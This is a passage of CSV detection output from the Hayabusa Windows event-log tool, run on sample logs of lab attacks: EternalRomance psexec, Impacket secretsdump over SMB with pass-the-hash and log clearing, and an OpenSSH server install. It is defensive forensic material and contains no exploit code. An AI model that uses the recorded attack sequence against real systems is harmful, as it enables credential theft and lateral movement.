File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb3084,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb3084,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb314d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb314d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb32cb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:13.258 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0xb32cb | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" 2021-04-22 19:02:14.393 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.406 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.619 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Apply-WindowsUnattend"" ParameterBinding(Set-Alias): name=""Value""; value=""Use-WindowsUnattend""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.619 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.620 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.620 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.620 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-ProvisionedAppxPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.621 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-ProvisionedAppXDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.621 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.621 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.622 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.622 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-AppProvisionedPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.623 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-AppPackageProvisionedDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.623 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.623 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx 2021-04-22 19:02:14.624 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-ProvisionedAppPackage"" ParameterBinding(Set-Alias): name=""Value""; 